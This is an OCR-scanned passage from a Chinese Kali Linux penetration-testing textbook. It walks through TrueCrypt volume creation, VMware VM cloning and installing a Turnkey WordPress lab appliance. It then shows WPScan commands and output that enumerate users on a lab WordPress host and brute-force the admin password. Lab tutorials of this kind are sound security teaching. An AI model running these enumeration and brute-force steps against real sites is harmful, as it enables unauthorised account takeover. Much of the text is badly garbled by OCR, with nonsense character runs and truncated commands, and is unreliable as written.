帮助 IH) < Prev Next> | 取消 (人 EC) 


图 2.12 Encryption Options 


1 


Y 
* 


显 


(8) 在 该 界面 选择 加 密 算法 ， 这 里 选择 默认 的 加 密 算法 AES， 然 后 单 击 Next 按 


钮 ， 将 显示 如 图 2.13 所 示 的 界面 。 


引 | 


7IN 


TrueCrypt Volume Creation Wizard "P 
Volume Size 

FT —  |[me s 
Free space available: 61.1 GB 


Please specify the size of the container to create. Note 
that the minimum possible size of a volume is 292 KB. 





帮助 IH) «Prev | Next » | 取消 1c) 


图 2.13 Volume Size 


(9) 在 该 界面 指定 耸 的 大 小 为 10GB， 然 后 单 击 Next 按 钮 ， 将 显示 如 图 2.14 所 示 的 
FT [Blo 





TrueCrypt Volume Creation Wizard k | SE 


Volume Password 


Password: 








Confirm password: |+ + asss 


Display password 
L.] Use keyfiles Keyfiles... 


It is very important that you choose a good password. You 
should avoid choosing one that contains only a single word 
that can be found in a dictionary (or a combination of 2, 3, 
or 4 such words). It should not contain amy names or dates 
of birth. It should not be easy to guess. A good password 
is a random combination of upper and lower case Letters, 
numbers, and special characters, such as (D ^ = $ * + etc. 
We recommend choosing a password consisting of more 
than 20 characters (the Longer, the better). The maximum 
possible Length is 64 characters. 








RERO (H) € Prev | Next > | D RC) 





图 2.14 Volume Password 


(10) 在 该 界面 输入 一 个 从 的 密码 ， 然 后 单 击 Next 按 钮 ， 将 显示 如 图 2.15 所 示 的 界 
Ho 


TrueCrypt 
k 


WARNING: Short passwords are easy to crack using brute 





force techniques! 


We recommend choosing a password consisting of more than 
20 characters. Are you sure you want to use a short password? 





(11) 该 界面 提示 设置 的 密码 太 短 ， 建 议 大 小 20 个 字符 。 如 果 确 认 要 使 用 该 密码 的 
话 ， 单 击 “ 是 ?按钮 ， 将 显示 如 图 2.16 所 示 的 界面 。 


TrueCrypt Volume Creation Wizard k 
Large Files 


* | will not store files larger than 4 GB on the volume 


Choose this option if you do not need to store files 
larger than 4 GB (4,294,967, 296 bytes) on the 
volume. 























J) Iwill store files larger than 4 GB on the volume 


Choose this option if you need to store files larger than 
4 GB (4,294,967, 296 bytes) on the volume. 

















FERH) «Prev | Next» | | EGRO) 














2.16 Large Files 


(12) 在 该 界面 选择 存储 到 疮 文件 的 大 小 ， 这 里 选择 | will not store files larger than 
4GB on the volume。 然 后 单 击 Next 按 钮 ， 将 显示 如 图 2.17 所 示 的 界面 。 


TrueCrypt Volume Creation Wizard TET 


Format Options 
Filesystem Options 


Filesystem type: | Linux Ext4 | v 


Volume Format Options 


In order to enable your operating system to mount your 
new volume, it has to be formatted with a filesystem. 


Please select a filesystem type. 


If your volume is going to be hosted on a device or 
partition, you can use ‘Quick format’ to skip encryption of 
free space of the volume. 





帮助 (H) <Prev | Next> | | 取消 (ec 


图 2.17 Format Options 


(13) 在 该 界面 选择 文件 系统 类 型 ， 默 认 是 FAT。 该 工具 还 支持 Linux Ext2、Linux 
EXt3 和 Linux Ext4 文 件 类 型 。 这 里 选择 Linux Ext4， 单 击 Next 按 和 纽 ， 将 显示 如 图 


2.18 所 示 的 界面 。 
TrueCrypt Volume Creation Wizard =- i A 

k 
Cross-Platform Support 


J | will mount the volume on other platforms 


Choose this option if you need to use the volume on 
other platforms. 


* | will mount the volume only on Linux 


Choose this option if you do not need to use the 
volume on other platforms. 
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I] 2.18 Cross-Platform Support 


(14) 该 界面 选择 挂 载 该 和 众 的 一 个 平台 ， 这 里 选择 第 二 种 方式 1 will mount the 
volume only on Linux， 单 击 Next 搜 钮 ， 将 显示 如 图 2.19 所 示 的 界面 。 


= 


TrueCrypt Volume Creation Wizard bar mäi | 
Volume Format 


Random Pool: 4847198273158EBE785D64DD518.. WM Shi 
Header Key: 
Master Key. 


Done Speed Left 


IMPORTANT: Move your mouse as randomly as possible 
within this window. The Longer you move it, the better. 
This significantly increases the cryptographic strength of 
the encryption keys. Then click Format to create the 
volume. 
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i] 2.19 Volume Format 


(15) Re BRA eH, boa x dS FormatiZéz, 'RÉg zn31582.20Pfzn H5 
界面 。 


TrueCrypt Volume Creation Wizard | | 
Volume Format 
Random Pool: CB62bE39274924F41B2C11DF62B.. M Shi 


Header Key. 1B2DA43413D07F2D700699C769. . 
Master Key. 0626EDBSEOSEADC71SFDABEACC. . 


m| - 


Done 9.404% Speed 70MB/s | Left | 2 minutes 





IMPORTANT: Move your mouse as randomly as possible 
within this window. The Longer you move it, the better. 
This significantly increases the cryptographic strength of 
the encryption keys. Then click Format to create the 
volume. 





















































| 


图 2.20 格式 化 过 程 


(16) 该 界面 显示 了 格 陈 化 的 进度 、 速 度 和 时 间 等 信息 。 该 过 程 运 行 完 后 ， 将 显示 
如 图 2.21 所 示 的 界面 。 


True Cry pt 


wy The TrueCrypt volume has been successfully created. 








图 2.21 TrueCrypt 郑 创建 成 功 


(17) 看 到 上 面 的 窗口 ， 表 示 TrueCrypt 疮 创建 成 功 了 。 此 时 ， 单 击 " 确 定 ” 按 钮 ， 将 
显示 如 图 2.22 所 示 的 界面 。 


TrueCrypt Volume Creation Wizard 
Volume Created 
The TrueCrypt volume has been created and is ready for 


use. If you wish to create another TrueCrypt volume, click 
Next. Otherwise, click Exit 





RIBh(H) < Prev Next > Exit 


I] 2.22 Volume Created 


(18) Ibm TrueCrypt em 6) 250m f. MRE 6) X —PTrueCrypteyis, 
单 击 Next 按 钮 。 否 则 单 击 Exit 按 纽 。 单 击 Exit 按 钮 后 ， 将 返回 到 图 2.6 所 示 的 界面 。 


2.5.2 文件 夹 解密 


在 上 一 小 节 中 成 功 创建 了 加 密 目 录 。 如 果 要 查看 加 密 的 内 容 ， 需 要 将 该 苞 解 密 后 才 
可 访问 。 为 了 解密 谷 ， 需 要 从 图 2.6 的 列表 中 选择 一 个 模 。 然 后 单 击 Select File... 按 
钮 ， 打开 刚才 创建 的 CryptVolume 逢 。 这 时 单 击 Mount 按 钮 将 显示 如 图 2.23 所 示 
的 界面 。 
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Volumes Favorites Tools Settings Help 











L Display password 
C Use keyfiles 





Volume Properties... 















































图 2.23 ERA 


在 该 界面 输入 创建 CryptVolume 时 设置 的 密码 ， 单 击 “ 确 定 " 按 钮 ， 将 显示 如 图 2.24 所 
示 的 界面 。 
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TrueCrypt We 


Volumes Favorites Tools Settings Help 


Slot Volume Size Mount Directory Type 


I/root/CryptVolume | 10.0 GB | /media/truecryptl 





Create Volume | | Volume Properties... | 


Volume 





























|/root/CryptVolume w Select File... 





s Never save history | Volume Tools... | | Select Device... 


| Auto-Mount Devices | | Dismount All Exit 


图 2.24 CryptVolume#stt 2x Fk.JJJ 


MAA LAS SICryptVolume4S BUE aie. ASHES. tbat, Aral 
Do i3 3X ATERBE ERME eux Te. KA REENA, FLAS 
i; Dismount All 按 钮 卸载 该 耸 。 
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第 3 革 ”高 级 测试 实验 罕 


高 级 测试 实验 军 可 以 构建 各 种 渗透 攻击 的 目标 系统 。 通 过 前 面 的 介绍 ， 大 家 已 经 了 
解 在 Kali Linux 下 可 使 用 的 工具 。 为 了 更 好 地 验证 这 些 工 具 的 作用 ， 必 须 有 一 个 高 级 
测试 实验 室 。 本 章 将 介绍 如 何 使 用 VMware Workstation 构 建 各 种 操作 系统 。 本章 主 
要 知识 点 如 下 : 


e 使 用 VMware Workstation ; 
e 攻击 WordPress 和 其 他 应 用 程序 。 


3.1 使 用 VMware Workstation 


在 第 1 章 简 略 地 讲解 了 在 VMware Workstation 上 安装 Kali Linux 虚 拟 环境 的 过 程 。 
VMware Workstation 人 允许 安 闭 操作 系统 并 且 运 行 虚 拟 环境 。 这 个 工具 是 非常 重要 
的 ， 它 可 以 为 束 悉 Kali Linux 功 能 提供 了 目标 主机 。 本 书 中 使 用 到 的 虚拟 机 操作 系统 
有 Windows XP, Windows 7、Metasploitable 2.0 和 Linux。 这些 系统 都 可 以 到 它们 
的 官网 下 载 相应 的 ISO 文件 ， 然 后 在 VMware Workstation 上 安装 。 这 些 安 装 系统 的 
安装 方法 和 在 第 1 章 介 绍 安装 Kali Linux 的 方法 一 样 ， 这 里 就 不 再 次 述 。 

当 用 户 在 主机 上 执行 任务 时 ， 可 能 会 导致 其 他 系统 不 稳定 甚至 无 法 运行 。 为 了 方便 
用 户 操 作 ，VMware Workstation 提 供 了 一 个 非常 好 的 工具 ， 实 现 虚 拟 环 境 的 复制 |。 


zw. HER TAP RROREAM A, mien 必须 将 该 系统 天 闭 。 
人 否则， 不 能 克隆 。 复 制 虚拟 环境 的 具体 操作 步骤 如 下 所 示 。 


(1) 在 VMware Workstation 主 界面 先 选择 要 复制 的 虚拟 机 。 然 后 在 该 界面 依次 选 
择 “ 虚 拟 机 ?管理 (M) F 克 隆 (C) ” 命 爷 ， 将 显示 如 图 3.1 所 示 的 界面 。 


欢迎 使 用 克隆 虚拟 机 向 导 


tio) 90 BNE BS EB LA REA 。 
POSR SERE SOR AORERE RE. 
应 在 虚拟 机 > RA 9 > 高 级 下 启 
用 模板 模式 。 


vmware 
Workstation 











图 3.1 欢迎 使 用 克隆 虚拟 机 同 导 
(2) 在 该 界面 单 击 " 下 一 步 ” 搜 钮 ， 将 显示 如 图 3.2 所 示 的 界面 。 


A285 Kali Linux 安全 渗透 教程 


克隆 源 | 
ABM US BRE TE? 


克隆 自 
9. 虚拟 机 中 的 当前 状态 (CQ) 
从 当前 状态 创建 运 接 克隆 振 凶 建 一 个 新 快照 。 


Td Peas (LPR IEE ML CS): 





图 3.2 克隆 源 


(3) 在 该 界面 可 以 选择 从 哪个 状态 创建 克隆， 这 里 选择 “虚拟 机 中 的 当前 状态 " 选 
项 。 然 后 单 击 “ 下 一 步 按 钮 ， 将 显示 如 图 3.3 所 示 的 界面 。 
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图 3.3 克隆 方法 


(4) 在 该 界面 选择 克隆 方法 。 黑 认 提 供 了 "创建 链接 克隆 "和 ”创建 完整 克隆 "两 种 方 
法 。 本 例 中 选择 "创建 完整 克隆 选项， 然后 单 击 "下 一 步 " 按 钮 ， 将 显示 如 图 3.4 所 示 
的 界面 。 


e 链接 克隆 : 它 是 从 父 本 的 一 个 快照 克隆 出 来 的 。 链 接 殉 降 需 要 使 用 到 父 本 的 磁 
意 文 件 ， 如 果 父 本 不 可 使 用 《比如 航 删 除 ) ， 那 么 链接 克隆 也 不 能 使 用 了 。 

e TNE: 它 是 一 个 独立 的 虚拟 机 ， 克 隆 结束 后 它 不 需要 共 皇 父 本 。 该 过 程 是 
完全 克隆 一 个 父 本 ， 并 且 和 父 本 完全 分 离 。 完 整 克隆 只 是 从 父 本 的 当前 状态 开 

始 殉 隆 ， 克 隆 结束 后 和 父 本 束 没 有 任何 关联 了 。 










新 虚拟 机 名 称 | 
您 要 为 此 虚拟 机 使 用 什么 名 称 ? 





EOE) 
Kali 的 克 隐 | 











AL) 


D: ER ELE Documents Virtual Machines\Kal 的 克隆 — SR. | 























50) aa) (aa 
3.4 新 虚拟 机 名 称 


(5) 该 界面 用 来 设置 虚拟 机 的 名 称 和 位 置 。 然 后 单 击 “ 完 成 "按钮 ， 将 显示 如 图 3.5 
所 示 的 界面 。 
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正在 克隆 虚拟 机 








w 正在 准备 克隆 操作 




















图 3.5 正在 克隆 虚拟 机 
(6) 该 界面 是 克隆 虚拟 机 的 一 个 过 程 。 交 隆 完成 后 ， 将 显示 如 图 3.6 所 示 的 界面 。 
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v 正在 准备 克隆 操作 
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图 3.6 克隆 完成 
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(7) 从 该 界面 可 以 看 到 虚拟 机 已 克隆 完成 ， 此 时 单 击 "关闭" 按钮， 克隆 的 虚拟 机 会 
自动 添加 到 VMware Workstation 主 窗口 界面 ， 如 图 3.7 所 示 。 
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图 3.7 克隆 的 虚拟 机 
(8) 现在 就 可 以 单 击 “ 开 局 此 虚拟 机 ” 按 纽 ， 运 行 克 隆 的 操作 系统 了 。 


3.2 攻击 WordPress 和 其 他 点 用 程序 


今天 越 来 越 多 的 企业 利用 SAAS (Software as a Service) 工具 应 用 在 他 们 的 业务 
中 。 例 如 ， 他 们 经 常 使 用 WordPress 作 为 他 们 网 站 的 内 容 管 理 系 统 ， 或 者 在 局 域 网 
中 使 用 Drupal 框 架 。 从 这 些 应 用 程序 中 找到 漏洞 ， 是 非常 有 价值 的 。 


为 了 收集 用 于 测试 的 应 用 程序 ，Turnkey Linux 是 一 个 非常 好 的 资源 。Turnkey 工 具 
的 官方 网 站 是 http://www.turnkeylinux.org。 本 节 将 下 载 最 流行 的 WordPress 
Turnkey Linux 发 行 版 。 


3.2.1 获取 WordPress 应 用 程序 


获取 WordPress 应 用 程序 的 具体 操作 步骤 如 下 所 示 。 


(1) 在 浏览 器 中 输入 http://www.turnkeylinux.org 地 址 ， 打 开 的 界面 如 图 3.8 所 示 。 
从 该 界面 下 载 Turnkey Linux. 





TURMKEY —— E 
1 y 一 ! | Low ir B eg -þm L 
Have you checked out the TurnKey Hub yet? Try the live demo! 
Total: 195.5 MB ($0.03/mo] Backup & Migration 7m ae Cloud Servers 
Secure and easy server backups Rapidly explore and deploy 
130.6 MB to Amazon 53. Automatically Wirginia (East USA] " 100+ free server apps in the 
restore servers from backups. Amazon EC? doud. 
Micra: $0.02 hour 
i Us. MD | Test backups in the cloud | Only a browser required. 
Benefits Blog 
100+ ready-to-use solutions: discover and leverage the best free software. Deploy solutions What s the best way to do 
quickly on bare metal, virtual machines, or in the doud [ree software bounties 
Lith Apr, 2014 
| Free as in speech: free software with full source code and a powerful build system. Free of TurnKey 13 critica Ti 


3.8 Turnkey= 5i 


(2) fi IHRE. TAALA FAAA. ETUR, 
图 3.8 只 截取 了 一 少 部 分 内 容 。 在 该 页 面 中 ， 用 户 可 以 尝试 使 用 各 种 软件 查找 漏洞 ， 
并 通过 工具 对 这 些 应 用 程序 来 测试 用 户 的 扩 术 。 本 例 中 将 选择 测试 WordPress， 辣 
下 滚动 鼠标 可 以 看 到 Instant Search 对 话 框 ， 如 图 3.9 所 示 。 
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(3) 在 该 对 话 框 中 输入 WordPress， 然 后 按 下 回 车 键 ， 将 显示 如 图 3.10 所 示 的 界 


Ho 
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WordPress x A 


WordPress - Blog Publishing Platform 

WordPress is a state-of-the-art publishing platform with a focus on aesthetics, web 
standards, and usability. It is one of the worlds most popular blog publishing 
applications, includes tons of powerful core functionality, extendable via literally 


MAPS FH 
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3.10 WordPress 应 用 程序 


(4) 在 该 界面 可 以 看 到 WordPress 程 序 已 经 找到 ， 此 时 单 击 WordPress-Blog 
Publishing Platform 链接 进入 下 载 页 面 ， 如 图 3.11 所 示 。 
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4 : F tegi | Regester vri Go | 
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k Web development : 

e Conbent management 
e Business management 


WordPress is a state-of-the-art publishing platform with a focus on aesthetics, 
web standards, and usability. It is one of the worlds most popular biog 可 
publishing applications, includes tons of powerful core functionality, extendable 








e Messaging | via literally hundreds of plugins, and supports full theming. Ki 
e [£esue tracking -— 
+ Database EM 
» SDE BUILDS: 24348 VM — 220MB ISO OVE, OpenStack. OpenVZ. OpenNode, Xen (7) Manifest & Sigs | 
RUM FROM BROWSER: Deploy Word | s bo khe Ama a oud 
WordPress Updates TKLDEY SOURCE: github OLED DOT (7) 


Nen Turkey WordPress 


YMF ae Sable verton: 13.0 (changelog) 
< > 


图 3.11 Turnkey F 3X, i H 


(5) 在 该 界面 选择 下 载 ISO 映 像 文 件 。 单 击 220MB ISO 链 接 ， 将 显示 如 图 3.12 所 示 


的 界面 。 


Subscribe to Security and News announcements 


Sign up to TurnKey's low-traffic announcements Email address: 
newsletter to get important security bulletins ERP SEM Baa CO 
and updates on major new releases. 

We won't spam you. See our Privacy Policy 
In the works: dozens of new apps, 
high-secunty deterministic Builds, clustering, | Subscribe and go straight to download | 
multi-app installations, better backups... ES 
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图 3.12 设置 邮箱 地 址 
(6) 该 界面 提示 为 了 安全 ， 需 要 填写 一 个 邮箱 地 址 。 填 写 完 后 ， 单 击 Subscribe 
and go straight to download 按 钮 ， 将 开始 下 载 Turnkey WordPress 软 件 。 


3.2.2 安装 WordPress Turnkey Linux 


本 小 节 将 介绍 在 VMware Workstation t 222WordPress Turnkey Linux, KF 
VMware Workstation 的 使 用 ， 在 第 1 章 中 已 经 详细 介绍 过 ， 这 里 融 不 再 资 述 。 安 交 
WordPress Turnkey Linux 的 具体 操作 步骤 如 下 所 示 。 


(1) 将 前 面 下 载 的 ISO 文件 导 和 人 到 光驱 中 ， 然 后 启动 此 虚拟 机 ， 将 显示 如 图 3.13 所 
示 的 界面 。 





TURMKEY 


Install to hard disk 


3.13 TURNKEY JE 7$ rf 


(2) 在 该 界面 选择 Install to hard disk 选 项 ， 按 下 “ 回 车 键 ?， 将 显示 如 图 3.14 所 示 的 
界面 。 
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and set up LUM 





图 3.14 选择 分 区 万 法 


(3) 该 界面 是 选择 分 区 的 方法 。 该 系统 提供 了 三 种 方法 ， 分 别 是 使 用 整个 矿 盘 并 
设置 LVM、 使 用 整个 倍 盘 和 手动 分 区 。 这 里 选择 第 一 种 ， 然 后 单 击 OK 按 钮 ， 将 显 
示 如 图 3.15 所 示 的 界面 。 





图 3.15 将 数据 写 入 磁盘 


(4) 该 界面 显示 了 分 区 的 信息 ， 这 里 提示 是 否 将 守信 人 改变 磁盘 并 配置 LVM 呢 ? 如 
果 想 要 重新 分 配 分 区 的 话 ， 融 单 击 No 按钮 ， 否 则 单 击 Yes 按 钮 。 本 例 中 单 击 Yes 按 
钮 ， 将 显示 如 图 3.16 所 示 的 界面 。 
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图 3.16 LVM 信 息 
(5) 该 界面 显示 了 LVM 的 配置 信息 。 单 击 OK 按 钮 ， 将 显示 如 图 3.17 所 示 的 界面 。 


TASEA Rr eens CE qus : 
llebian Installer Live 





图 3.17 使 用 引导 分 区 的 谷 组 


(6) 该 界面 提示 使 用 引导 分 区 的 答 组 来 安 委 系统 。 此 时 ， 单 击 OK 按 钮 ， 将 显示 如 
图 3.18 所 示 的 界面 。 





图 3.18 WENDER 


(7) 该 界面 显示 了 磁盘 的 分 区 表 信 息 ， 此 时 提示 是 侣 要 写 人 效 据 。 这 里 单 击 Yes 按 
钮 ， 将 显示 如 图 3.19 所 示 的 界面 。 
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图 3.19 复制 数据 到 磁盘 


(8) 该 界面 显示 了 复制 数据 的 磁盘 的 一 个 进度 。 复 制 完 后 ， 将 显示 如 图 3.20 所 示 
的 界面 。 





图 3.20 £GRUBBIS 


(9) 该 界面 提示 是 人 否 安 委 GRUB5 引 导 加 载 程序 的 主 引 导 记 录 。 这 里 单 击 Yes 按 钮 ， 
将 显示 如 图 3.21 所 示 的 界面 。 





图 3.21 ERE B TRAC 


(10) 该 界面 显示 WordPress Turnkey Linux 已 经 安装 完成 ， 是 否 现在 重新 启动 系 
统 。 单 击 Yes 按 钮 ， 将 显示 如 图 3.22 所 示 的 界面 。 





3.22 Root 密码 
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(11) 在 该 界面 为 Root 用 户 设 置 一 个 密码 。 输 入 密码 后 ， 单 击 OK 按钮 ， 将 显示 如 
图 3.23 所 示 的 界面 。 





图 3.23 Root 确认 密码 


(12) 该 界面 要 求 再 次 为 Root 用 户 输 入 相同 的 密码 ， 单 击 OK 按钮 ， 将 显示 如 图 
3.24 所 示 的 界面 。 





图 3.24 MySQL 密 码 


(13) 在 该 界面 为 MySQL 服 务 的 Root 用 户 设 置 一 个 密码 ， 设 置 完 后 单 击 OK 按钮 ， 
将 显示 如 图 3.25 所 示 的 界面 。 





图 3.25 MySQL 确 认 密 码 


(14) 在 该 界面 再 次 为 MySQL 服 务 的 Root 用 户 输入 相同 的 密码 ， 然 后 单 击 OK 按 
钮 ， 将 显示 如 图 3.26 所 示 的 界面 。 
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3.26 Wordpress 用 户 admin 密 码 


(15) 在 该 界面 要 求 为 Wordpress 的 用 户 admin 设 置 一 个 密码 ， 输 入 密码 后 ， 单 击 
OK 按钮 ， 将 显示 如 图 3.27 所 示 的 界面 。 





3.27 Wordpress 用 户 admin 确 认 密 码 


(16) 在 该 界面 再 次 为 Wordpress 用 户 admin 输 入 相同 的 密码 ， 然 后 单 击 OK 按钮 ， 
将 显示 如 图 3.28 所 示 的 界面 。 








图 3.28 设置 邮件 地 址 


(17) 该 界面 提示 为 Wordpress 用 户 admin 设 置 一 个 邮件 地 址 ， 这 里 使 用 默认 的 
admin@example.com。 然 后 单 击 Apply 按 钮 ， 将 显示 如 图 3.29 所 示 的 界面 。 
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图 3.29 Initialize Hub Services 


(18) 该 界面 显示 了 初始 化 Hub 服 务 信 息 ， 在 该 界面 单 击 Skip 按 钮 ， 将 显示 如 图 
3.30 所 示 的 界面 。 





图 3.30 Security updates 


(19) 该 界面 提示 是 否 现在 安 沪 安 全 更 新 ， 这 里 单 击 Install 按 钮 ， 将 显示 如 图 3.31 
所 示 的 界面 。 
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图 3.31 WORDPRESS appliance services 


(20) 该 界面 显示 了 WordPress 应 用 服务 的 详细 信息 ， 如 Web 地 址 、Web shell 地 
址 和 端口 、Webmin 地 址 、PHPMyAdmin 地 址 和 端口 及 SSH/SFTP 地 址 和 端口 等 。 
此 时 ， 表 明 WordPress Turnkey Linux 就 可 以 使 用 了 。 


3.2.3 V i WordPress 应 用 程序 


E— h ft 48 f WordPress pyle. su TERRI EL 6 zi WordPress dL, TE 
Kali Linux 下 使 用 WPScan 攻 击 它 。WPScan 是 一 个 黑 盒 安全 扫描 器 ， 它 允许 用 户 坦 
找 Word Press 安 和 妆 版 的 一 些 已 知 的 安全 漏洞 。 本 小 节 将 介绍 使 用 WPScan 工 具 攻 击 
WordPress 应 用 程序 。 


WPScan 在 Kali Linux 中 已 经 默认 安装 。 它 的 语法 格式 如 下 所 示 : 


wpscan [选项 ] [MA] 


弟 用 的 选项 如 下 所 示 。 
e --update : 更 新 到 最 新 版本 。 
e --url|-u <target url» : 指定 扫描 WordPress 的 URL (统一 资源 定位 符 ) 或 域名 。 
e --force |-f : 如 果 远 程 站 点 正 运行 WordPress， 强 制 WPScan 不 检查 。 
e --enumerate |-e [option(s)] : 计算 。 该 参数 可 用 的 选项 有 u、Uu[10-20]、p、 


vp、ap、tt、t、vt 和 at。 其 中 表示 用 户 名 从 id1 到 10 ; u[10-20] 表 示 用 户 名 从 
id10 到 20 《〈[ 中 的 字符 必须 写 ) ; p 表 示 插 件 程序 ; vp 表 示 仅 漏洞 插件 程序 ; ap 
表示 所 有 插件 程序 (可 能 需要 一 段 时 间 ) ; tt 表示 timthumbs ; t 表 示 主 题 ; vR 
示 仅 漏洞 主题 ; at 表示 所 有 主题 (可 能 需要 一 段 时 间 ) 。 


【实例 3-1】 使 用 WPScan 攻 击 WordPress 程 序 的 具体 操作 步骤 如 下 所 示 。 
(1) 在 Kali Linux 下 ， 查 看 WPScan 的 帮助 信息 。 执 行 命 全 如 下 所 示 : 
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root@localhost:~# wpscan -h 


WordPress Security Scanner by the WPScan Team 
Version v2.2 
Sponsored by the RandomStorm Open Source Initiative 
@ wPScan , Qethicalhack3r, Qerwan lr, Qgbrindisi, @_FireFart_ 


Help : 


Some values are settable in conf/browser.conf.json 

user-agent, proxy, proxy-auth, threads, cache timeout and reques! 
m conf/browser.conf.json). 
--basic-auth «username:password» Set the HTTP Basic authenticatior 


--wordlist | -w «wordlist» Supply a wordlist for the password brut 
--threads | -t «number of threads» The number of threads to use Y 
requests. (will override the value from conf/browser. conf.json) 
--username | -U «username» Only brute force the supplied username 
- -help | -h This help screen. 

--verbose | -v Verbose output. 

Examples : 


-Further help ... 
ruby ./wpscan.rb --help 


-Do 'non-intrusive' checks ... 
ruby ./wpscan.rb --url www.example.com 


-Do wordlist password brute force on enumerated users using 50 thre 
ruby ./wpscan.rb --url www.example.com --wordlist darkcOde.lst --tl 


-Do wordlist password brute force on the 'admin' username only ... 
ruby ./wpscan.rb --url www.example.com --wordlist darkcOde.lst --u: 





执行 以 上 命令 后 ， 会 输出 大 量 信息 。 输 出 的 信息 中 显示 了 WPScan 的 版 本 信息 、 使 
用 方法 及 WPScan 的 例子 等 。 由 于 篇 幅 的 原因 ， 这 里 贴 了 一 部 分 内 容 ， 其 他 使 用 省 
Ags (...... ) 取代 。 


(2) 使 用 WPScan 攻 击 WordPress 虚 拟 机 。 本 例 中 ，WordPress 的 |P 地 址 是 
192.168.41.130。 执行 命令 如 下 所 示 : 


root@localhost:~# wpscan -u 192.168.41.130 
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WordPress Security Scanner by the WPScan Team 
Version v2.2 
Sponsored by the RandomStorm Open Source Initiative 
@ wPScan , Qethicalhack3r, Qerwan lr, Qgbrindisi, @ FireFart 


| URL: http://192.168.41.130/ 
| Started: Thu Apr 17 13:49:37 2014 


[!] The WordPress 'http://192.168.41.130/readme.html' file exists 
[+] Interesting header: SERVER: Apache/2.2.22 (Debian) 

[+] Interesting header: X-POWERED-BY: PHP/5.4.4-14+deb7u8 

[+] XML-RPC Interface available under: http://192.168.41.130/xmlrp« 
[+] WordPress version 3.6.1 identified from meta generator 


[+] WordPress theme in use: twentythirteen v1.0 


| Name: twentythirteen v1.0 
| Location: http://192.168.41.130/wp-content/themes/twentythirteer 


[+] Enumerating plugins from passive detection 
No plugins found 


[+] Finished: Thu Apr 17 13:49:41 2014 

[+] Memory used: 2.414 MB 

[+] Elapsed time: 00:00:03 
J 了 了 耿耿 | 
输出 的 信息 显示 了 WPScan 一 个 简单 的 攻击 过 程 。 

(3) 列 出 用 户 名 列表 ， 执 行 命 分 如 下 所 示 : 





root@localhost:~# wpscan -u 192.168.41.130 -e u vp 


NN / / \ / | 
NON YN | |) es 


WordPress Security Scanner by the WPScan Team 
Version v2.2 
Sponsored by the RandomStorm Open Source Initiative 
@ wPScan , Qethicalhack3r, Qerwan lr, Qgbrindisi, @_FireFart_ 


| URL: http://192.168.41.130/ 
| Started: Thu Apr 17 13:50:49 2014 


[!] The WordPress 'http://192.168.41.130/readme.html' file exists 
[+] Interesting header: SERVER: Apache/2.2.22 (Debian) 

[+] Interesting header: X-POWERED-BY: PHP/5.4.4-14+deb7u8 

[+] XML-RPC Interface available under: http://192.168.41.130/xmlrp« 
[+] WordPress version 3.6.1 identified from meta generator 


[+] WordPress theme in use: twentythirteen v1.0 


| Name: twentythirteen v1.0 
| Location: http://192.168.41.130/wp-content/themes/twentythirteer 


[+] Enumerating plugins from passive detection 
No plugins found 


[+] Enumerating usernames 
[+] Wwe found the following 1 user/s: 


a jpeceseac 十 
| Id | Login | Name | 
a decascac 十 
| 1 | admin | admin | 
a 让 二 十 


[+] Finished: Thu Apr 17 13:50:54 2014 
[+] Memory used: 2.379 MB 
[+] Elapsed time: 00:00:04 


a eee 
从 输出 的 信息 中 可 以 看 到 当前 系统 中 只 有 一 个 用 户 ， 名 为 admin。 


(4) 为 WPScan 指 定 一 个 wordlist 文 件 ， 使 用 --wordlist «path to file> 选 项 。 执 
DU FFIR : 





root@localhost:~# wpscan -u 192.168.41.130 -e u --wordlist /root/ v 


Xo "E, 
Ae EE ot | [MB] m, MT URN o aa S 


WordPress Security Scanner by the WPScan Team 
Version v2.2 
Sponsored by the RandomStorm Open Source Initiative 
@ WwPScan , Qethicalhack3r, Qerwan lr, Qgbrindisi, @ FireFart 


| URL: http://192.168.41.130/ 
| Started: Thu Apr 17 13:54:51 2014 


[!] The WordPress 'http://192.168.41.130/readme.html' file exists 
[+] Interesting header: SERVER: Apache/2.2.22 (Debian) 

[+] Interesting header: X-POWERED-BY: PHP/5.4.4-14+deb7u8 

[+] XML-RPC Interface available under: http://192.168.41.130/xmlrp« 
[+] WordPress version 3.6.1 identified from meta generator 


[+] WordPress theme in use: twentythirteen v1.0 


| Name: twentythirteen v1.0 
| Location: http://192.168.41.130/wp-content/themes/twentythirteer 


[+] Enumerating plugins from passive detection 
No plugins found 


[+] Enumerating usernames 
[+] We found the following 1 user/s: 


p doncc 十 
| Id | Login | Name | 
qo Se eS SaaS = Se + 
| 1 | admin | admin | 
eee ete oso s= 于 二 十 


[+] Starting the password brute forcer 
Brute Forcing ‘admin' Time: 00:00:00 < > (59 / 20575) 0.28% 
ETA: 00:00:00 
[SUCCESS] Login : admin Password : 123456 


Te Teo 下 十 
| Id | Login | Name | Password | 
a fio SSS aas fio SS aaa Sass + 
| 1 | admin | admin | 123456 | 
ios Sadie os oos duces do-eneneelc 十 


[+] Finished: Thu Apr 17 13:54:56 2014 
[+] Memory used: 2.508 MB 
[+] Elapsed time: 00:00:05 





从 输出 的 信息 中 ， 可 以 看 到 WordPress 用 户 admin 的 密码 已 被 破解 出 。 


第 4 章 信息 收集 


渗透 测试 最 重要 的 阶段 之 一 束 是 信息 收集 。 为 了 启动 渗透 测试 ， 用 户 需 要 收集 关于 
目标 主机 的 基本 信息 。 用 户 得 到 的 信 Ame, 56 测 MR eH neta Kali 


Linux 操 作 系统 上 所 供 下 SEM 理 和 组 织 目标 主机 的 数据 ， 使 用 

户 得 到 更 好 的 后 期 侦察 。 本 章 将 介绍 Maltego、CaseFile 和 Nmap 工 具 的 使 用 其 主要 
知识 点 如 下 

e 枚 举 服务 ; 

© 3u 3x PA 2 43m B; 

。 识 别 活路 的 主机 和 坦 看 打开 的 端口 ; 

e 系统 指纹 识别 ; 

e 服务 指纹 识别 ; 

E 其 他 信息 收集 手段 

e 使 用 Maltego 收 集 信 息 ; 

e 绘制 网 络 医 


4.1 枚 举 服务 


em nl 它 允 许 用 户 从 一 个 网 络 中 收集 某 一 类 的 所 有 相关 信息 。 本 节 将 介 
绍 DNS 枚 举 和 SNMP 枚 举 技 术 。DNS 枚 举 可 以 收集 本 地 所 有 DNS 服务 和 相关 条 目 。 
DNS 枚 举 可 以 帮助 用 户 收 集 目 标 组 织 的 关键 信 息 ， 如 用 户 名 、 计 算 机 名 和 IP 地 址 
F, 为 了 获取 这 些 信 息 ， 用 户 可 以 使 用 DNSenum 工 具 。 要 进行 SNMP 枚 举 ， 用 户 
